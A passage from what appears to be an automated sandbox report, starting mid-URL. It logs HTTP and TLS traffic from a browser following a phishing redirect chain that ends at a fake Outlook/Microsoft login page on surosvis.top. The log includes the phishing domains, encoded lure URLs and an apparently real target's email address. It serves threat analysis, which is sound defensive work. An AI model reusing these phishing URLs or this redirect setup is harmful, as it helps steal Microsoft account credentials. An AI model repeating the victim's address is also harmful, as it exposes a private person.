zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=true	HTTP Parser: No <meta name="copyright".. found
Source: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=true	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 40.126.32.74:443 -> 192.168.2.17:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.74:443 -> 192.168.2.17:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.17:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.17:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49751 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	HTTP traffic: Redirect from: trk.klclick3.com to https://viptim.ro/tracking/?_kx=qqvqv7ptktvf-h7icyjl1j6ayjdrz9cf7t5_maw1x_ei05hf6bb9vkfjonw776uh.yegnps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	HTTP traffic: Redirect from: gaunited.org to https://surosvis.top/?dataxx0=eyjhbgcioijiuzi1niisinr5cci6ikpxvcj9.eyj1cmwioijodhrwczovl3n1cm9zdmlzlnrvcc8ilcjkb21haw4ioijzdxjvc3zpcy50b3ailcjrzxkioii2ruh0m3lzwwhfemyilcjxcmmioijjaglnbgv5qgxpdmutcxvpbm4uy29tiiwiawf0ijoxnziwntuxmtuxlcjlehaioje3mja1nteynzf9.iy8jm2jezr_1izy9t3ylvf9gldfmmt0h7qf5ipqzvwu

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 52.98.179.146 52.98.179.146
Source: Joe Sandbox View	IP Address: 13.107.246.60 13.107.246.60
Source: Joe Sandbox View	IP Address: 104.17.3.184 104.17.3.184
Source: Joe Sandbox View	IP Address: 20.190.159.68 20.190.159.68
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pfzebkrn3nRw4rR&MD=dE5apEtF HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /url?a=trk.klclick3.com%2fls%2fclick%3fupn%3du001.dtwVv1Ru50yD1xohsam-2FjGUphIs0dx6BEFCnPUKnDVd8WxxN6ke5PrYREmrbc2FaACBkT2P6I04Err05g1V2G-2FLWFbGytRFzYyHXDtGMPXvgKpTkM4PAsDhkmIIVHb75Z95k7dO9towCf1JeVC0-2BltHIRoei9lcL45PoMfUZg58-3Dh2f-_exTV-2B0nr75-2FAh2SIjRnOxD8JLIRVpQeWRH3nYFKkscxLUYDZn2KtraB9INOvu-2FWzVBLxft0V1cd3MxM8ltrigbptEVCIy4WvDfcq3o-2F1k9y8xxEh-2BmskMqWS1cAI0cUyybGysibzx60BajiblorrgTAih5eI-2FeIKWcpJ7y5D-2BfNj4kkwASBztE4Llx3YbAa3eGKg8vYsy69633-2Bs7KvPlQGtF3LlYx8tlvzy3u75ylBi1w7Tw6ZQ9q7Gw-2B4SvOdnV3-2FGM7WkcnHVnD74QIHFr87Q9bzLB7aV09brNp-2FGGlceXCU-2BCwap3JWTFzuYoGojteFQ6cZ-2BeKHASwrbaJ0fCeoOb5V9VXY51l9YVHkIcBH6wmagxtNtSJCYMzdyhhrMeVanCoqORb9EWLo04ONXAGlz2DKVGTIZnWm-2BTIagNPs4eFWbG1RY3zOOaFl-2BixPuWMrjPD7ymstCwPGDTI8xH7pdc0bOCntvjSd-2FKIIH1AE-3D&c=E,1,i0-TZ9sXrOnWu3n01gckjTjDlt13jbiHHHyOen1ztoOXCOTRFajJR67WUUfxHg4eD2yKNuMiH6kNQH7GWwT9vqakPcW-Xjgx6yxMACB_jKbE1i_F&typo=1\ HTTP/1.1Host: linkprotect.cudasvc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ls/click?upn=u001.dtwVv1Ru50yD1xohsam-2FjGUphIs0dx6BEFCnPUKnDVd8WxxN6ke5PrYREmrbc2FaACBkT2P6I04Err05g1V2G-2FLWFbGytRFzYyHXDtGMPXvgKpTkM4PAsDhkmIIVHb75Z95k7dO9towCf1JeVC0-2BltHIRoei9lcL45PoMfUZg58-3Dh2f-_exTV-2B0nr75-2FAh2SIjRnOxD8JLIRVpQeWRH3nYFKkscxLUYDZn2KtraB9INOvu-2FWzVBLxft0V1cd3MxM8ltrigbptEVCIy4WvDfcq3o-2F1k9y8xxEh-2BmskMqWS1cAI0cUyybGysibzx60BajiblorrgTAih5eI-2FeIKWcpJ7y5D-2BfNj4kkwASBztE4Llx3YbAa3eGKg8vYsy69633-2Bs7KvPlQGtF3LlYx8tlvzy3u75ylBi1w7Tw6ZQ9q7Gw-2B4SvOdnV3-2FGM7WkcnHVnD74QIHFr87Q9bzLB7aV09brNp-2FGGlceXCU-2BCwap3JWTFzuYoGojteFQ6cZ-2BeKHASwrbaJ0fCeoOb5V9VXY51l9YVHkIcBH6wmagxtNtSJCYMzdyhhrMeVanCoqORb9EWLo04ONXAGlz2DKVGTIZnWm-2BTIagNPs4eFWbG1RY3zOOaFl-2BixPuWMrjPD7ymstCwPGDTI8xH7pdc0bOCntvjSd-2FKIIH1AE-3D HTTP/1.1Host: trk.klclick3.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /tracking/?_kx=QQVQv7pTKTVf-H7icyjL1J6aYjdRZ9Cf7t5_maW1x_Ei05hf6bB9VkFjonW776uh.YeGNPs HTTP/1.1Host: viptim.roConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?xhjvrczy&email=chigley@live-quinn.com HTTP/1.1Host: gaunited.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://viptim.ro/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?xhjvrczy=7916a6b310ba6eced760b22d1d46271e3b1540bdd0cf0f26568259caa28bcc2cc4a34477ba1ecd9bb18135b16dc936bdbe30f9b85e8f3a82522031c68449ab57&email=chigley%40live-quinn.com HTTP/1.1Host: gaunited.orgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://viptim.ro/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gaunited.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/191f93ebdf8e/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gaunited.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/a6jpw/0x4AAAAAAAeIDT3Zcm3iJj6N/auto/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://gaunited.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8a0a82987970c32e&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/a6jpw/0x4AAAAAAAeIDT3Zcm3iJj6N/auto/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/a6jpw/0x4AAAAAAAeIDT3Zcm3iJj6N/auto/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: gaunited.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gaunited.org/?xhjvrczy=7916a6b310ba6eced760b22d1d46271e3b1540bdd0cf0f26568259caa28bcc2cc4a34477ba1ecd9bb18135b16dc936bdbe30f9b85e8f3a82522031c68449ab57&email=chigley%40live-quinn.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1568611667:1720549685:hcITSD1snsn-aMiu0_StB7Gg7A55WhOph7Ykxs_VGMc/8a0a82987970c32e/97aa2a1169caae0 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8a0a82987970c32e/1720551138045/83eca55ffefc35a206bc834e1ad7c87ee041961d6ecd33d2ac08f2651b37ce79/RS367FsQ-4V6NbU HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/a6jpw/0x4AAAAAAAeIDT3Zcm3iJj6N/auto/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8a0a82987970c32e/1720551138048/0QYB1HrpDfk9kF8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/a6jpw/0x4AAAAAAAeIDT3Zcm3iJj6N/auto/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8a0a82987970c32e/1720551138048/0QYB1HrpDfk9kF8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1568611667:1720549685:hcITSD1snsn-aMiu0_StB7Gg7A55WhOph7Ykxs_VGMc/8a0a82987970c32e/97aa2a1169caae0 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1568611667:1720549685:hcITSD1snsn-aMiu0_StB7Gg7A55WhOph7Ykxs_VGMc/8a0a82987970c32e/97aa2a1169caae0 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3N1cm9zdmlzLnRvcC8iLCJkb21haW4iOiJzdXJvc3Zpcy50b3AiLCJrZXkiOiI2RUh0M3lZWWhFemYiLCJxcmMiOiJjaGlnbGV5QGxpdmUtcXVpbm4uY29tIiwiaWF0IjoxNzIwNTUxMTUxLCJleHAiOjE3MjA1NTEyNzF9.iy8JM2jeZr_1izy9t3YlVF9GLDfmmT0H7qF5iPqzVWU HTTP/1.1Host: surosvis.topConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://gaunited.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?qrc=chigley%40live-quinn.com HTTP/1.1Host: surosvis.topConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://gaunited.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc
Source: global traffic	HTTP traffic detected: GET /owa/?login_hint=chigley%40live-quinn.com HTTP/1.1Host: surosvis.topConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://gaunited.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc
